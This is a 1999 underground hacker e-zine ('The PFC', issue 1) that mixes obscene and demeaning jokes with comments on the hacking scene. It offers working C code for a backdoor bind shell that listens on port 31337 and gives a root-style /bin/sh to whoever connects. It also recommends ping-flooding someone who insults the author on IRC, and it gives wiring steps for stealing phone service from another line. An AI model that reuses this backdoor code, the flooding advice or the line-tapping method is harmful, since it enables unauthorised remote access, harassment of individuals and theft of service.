pFC---1 ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() THIS IS THE PFC---THE PIG FUCKERS CORNER---THIS IS THE PFC ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() issue#1 1999 dont copy my shit and take credit please /--------------------------------------------------------\ =>/right now you must be asking yourself..." am i a pillow biter b/c i dont know what da fuck the pig fuckers corner is?" and my answer for you is... sorta.//\ =(*)the pig fuckers corner is a p1mpist, elitist publication made with shitty asskey with one common goal: well a few... get mo-fo's to learn more about hacking, phreaking, the shatty government and pig fucking. wait no... uh yeah... maybe. =>/WHO IS THE PFC??? simonsays you are a pig fucker and simon puts out this crapper. have fun you guys! =P fuck you _____________________[][][][][][][[======================| WHAT j00 wILl f1nd iN tH3 pFC..... -pig fucking -articles on under ground shit -funny stories about y0 mama -more pig fucking and how to find a pfc near you -interviews -and my thoughts on HNN news and how it affects y0 ass !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!@@@@@@@@@@@@@@@############## So l3t the p1g fucking cOmmence already||||----> ///--->FORE WORD//---) =[*] what tha fuck is up with the hacking scene anyway theses days??? does anyone know anymore... i dont i fuck pigs. i mean you got IRC e1337ism, hotline for da mac users some lame ass web sites where you can get "r33t" progs, that dont do shit cause most anthing useful runs on a UNIX based os anyway, and first class for whatever... ok there is one good tool out there i know of: back oriface ( created by sir dystic and released or announce (i dont member) at def con 6.0 in AUGUST '98.... good tool 69% of Austrailia's isps are infected with it. but what does all this mean? that kids who dont know shit about taking shits can be malicous pig fuckers and rape machines? well maybe. Today there is a lack of style in the hacking world..."5kr1pT k1Dd13s" (who all the elitist hackuz diss because they use scripts written by THEM) make stupid web sites to be vandals and justify th31r ass wiping with the good excuses like "you had poor security", or "your isp service was slow". that kinda pink taco has no style... now take a man like Gallegar... he has some fucking style... who wouldda thought that smashing shit with a bigarse hammer who be sooooo fucking awesome... i sure didn't. but he did. he has style. another thing... Legions of the underground or grounds i dont know... anyway they declaired war on china and iraq for human rights violations... now we can all relate to that.. it has style. but then they back out for whatever reason... and they changed their story about fucking computer systems up... now where did they lose style on that? i dont know but i do know i was looking forward to some CNN report like: "china was shut off from the world today cause they are stupid arogant bitches that think they can boss the fucking world around." but as i read today on the HNN ( that LoU somehow accomplished their mission even tho it seems to me they did nothing but pig fucking. i still give them mad props cause they are (and i am sure of this) better at haxoring than me and they seems to have good morals... ok point... IF YOU READ THIS, GET SOME FUCKING STYLE DONT BE A JIZ MOPPER LIKE THE HACKER B4 YOU. -----END fore word{}{}{}{}{|}\[\][\[\[\[][\][\[--------------> ***JuXtaposed... y0 mama and a0l*** -10 good/bad things about y0 mama and aol-- AOL---------BAD---------- yo mama 1. slow connection speeds 1. same 2.smells like phish 2. again, same more private rooms 3. ripple tit skins warez666 and macwarez 4.get booted offline alot 4. boots me outta y0 house after ass pirating -------GOOD----------------------- = good 1. me + y0 dad + mama = scary but not pig fucking 2.all mah friends on it 2. same (no wait thats bad) okay i'm done with this... : ::: :::::: -----------888888888888888888888888888888888888888())))===\) ho7l1ne: nothing worthy now first class: cant tell any cause fc is where all the pig fucking goes on WORKD WIDE WEB: - hacker news run by that space rogue guy... i dont know what to say about him... i guess he is nice (i dont know) has a shell on where j00 will find progs for the mac and broken links up tha buttox... oh hnn is really goot, yes goot. here are some stats: January 99 HITS 272486 December 98 1243241 November 98 657811 October 98 52734 September 98 33985 August 98 359 <---eeek slump July 98 35711 - run by logik... he is in msec (whatever that is) and macs good progs for the mac... uh... - for pictures of dicks falling off and uh shit and poop and stuff. i guess cause they make 31337 products for cutting thru nt passwd's and other crap. and cause they know their shit. - ran by my friend epic... he has lost interest in this site but whatever, check that shit out it has some hacked web sites archive and a zine... no pig fuxoring but nice nonetheless. cause the give a fuck about mitnik and have a print zine that makes you want to diareahia(sp?) (editors note: diareahea = good) --------------------------------------------------\\ UNIX TEXT ABOUT binding shells to socket (dont know what that does but is has the # 31337 in it so it must be good) //-------------------------------------------------- /* quick thingy... bind a shell to a socket... defaults to port 31337 */ /* code by */ /* don't forget.. when you connect to the port.. commands are like: */ /* "ls -l;" or "exit;" (don't forget the ';') */ #define PORT 31337 #include #include #include #include #include int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; struct sockaddr_in serv_addr; struct sockaddr_in client_addr; int main () { soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (soc_des == -1) exit(-1); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(PORT); soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); if (soc_rc != 0) exit(-1); if (fork() != 0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if (fork() != 0) exit(0); soc_rc = listen(soc_des, 5); if (soc_rc != 0) exit(0); while (1) { soc_len = sizeof(client_addr); soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); if (soc_cli < 0) exit(0); cli_pid = getpid(); server_pid = fork(); if (server_pid != 0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh",(char *)0); close(soc_cli); exit(0); } close(soc_cli);}} |||||||||||||||||||||||||||||||||||||||||________________________|||||||||||||||||||||||||||||| WHAT THE HELL IS KOAN AND WHY DO I GIVE MY FIRST BORN CHILD? WELL KOAN IS A FreeBSD 2.2.7-STABLE MACHINE THAT IS RUN BY SOME LADY HACKER. SOME PEOPLE DONT LIKE HER AND OTHERS DO. DONT KNOW THE BITCH PERSONALLY SO WHO CARES RIGHT... SO WHAT THIS BOX IS GOOD FOR: IT ALLOWS YOU TO HACK LEGALLY AND LEARN HOW TO HACK IF YOU ARE NEW AT UNIX STYLE OS'S.. IT ALSO HAS A DECENT PINGER APP, ROOT DIR USR/SRC/SBIN.... IT IS CALLED "PING" IN LOWER CAPS... THIS IS GOOD FOR SLOWING THE CONNECTIONS OF SOMEONE YOU WANT TO PIMP... EXAMPLE: EL33TIST FUCK CALLS ME A LAMER ON IRC CAUSE I USE AOL (100 FUCKING FREE HOURS THAT IS GOOD) AND I WANT TO GET BACK AT HIM... SO I GO TELNET TO KOAN.HAPPYHACKER.ORG AND LOGIN AS GUEST AND MY PASSWD IS STUPID. THEN I PRESS "CD /" AND THEN ENTER. IT TAKES ME TO THE ROOT DIR. THEN DO "CD USR" "CD SRC" "CD SBIN" (THERE MIGHT BE A FASTER WAY BUT I DONT KNOW I AM THE PIG FUCKER FOR CHRIST SAKES. THEN PRESS "LS". YOU WILL SEE PING SOME UP. TYPE "./PING" AND IT TELLS YOU HOW TO FUCK THE DUDE UP... BUT I LIKE KOAN BECAUSE U CAN TEST ALL THE COOL SCRIPTS IN CD HOME/TMP DIR. KOAN PROVIDES A GOOD SERVICE FOR PEEPS. MY FRIEND EPIC WHO IS PART OF SOME GROUP MSEC ROOTED THEM THE OTHER MONTH... HAVE PHUN AND C YA THERE. ************&*^%$&^&(*&*&(*#&(*&#($*&(*%^(#&$*)@*)&$(*&%)* ***attention phreakers and hackers and such who use macintoshes*** are you tired of your old shitty war dialer? do you with there was a PPC native one that wasn't designed for your mac plus running system 6? welll me too lets do somethin about that shit... email for more info.. have style you cacks. member war diars are good... find carriers etc ******************************************************* this is a little shitter i did when my momy took away my fone line when i got addicted to the internet (ha!) so my momy took my fone away by calling up ma bell and sayin like "y0 bitch u bess be takin mah sons done service away cause he looks at porn and shit of y0 skank ass on da internet" so my service was gone... but we still had the second line installed in the house. so being the devil monger i am i decided i wanted fone access to my room... i walked around my house till i found a grey box with miss bells logo on it. i opened that shit up and this is what i saw... (i am doing this off memory so it might be a little off but you should beable to fige tha shit out) LINE #2 (my line no service) red wire--> (1)----(3) <---this is green wire / \ (0) ---------(0) LINE #1 (moms line with service) red ---> (2)-----(4) <---this is green wire / \ (0) ---------(0) this is what you will want to do to get a dial tone (service) to line #2... i hope you can fallow this cause this is tough shit... like the kinda shit u get after eating korn and rocks and chilie etc... you take a copper wire and connect it from (1) -> (2) and take another wire and do the same for (30-> (4)... now you should have done some nice rewiring that the fone company would have charged you $60 bux an hour for plus parts. |_|_|-------------------------------------------|_|_| NEWS FROM HNN WE SHOULD CARE ABOUT |_|_|-------------------------------------------|_|_| from HNN ( 1/6/99 contributed by Space Rogue A study commissioned by DOD raises questions about whether the US should pursue offensive strategies in cyber space to attack the infrastructures of opposing forces. Some feel that pursuing an offensive strategy such as this may open the door to possible coordinated and sophisticated attacks by other countries. The report states that the development of Offensive Information Warfare capabilities may create a situation similar to those present by nuclear, chemical and biological weapons today. _+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+__ THAT IS ALL.... MAIL YOUR COMMENTS TO SIMONSAYS@NETLIMIT.COM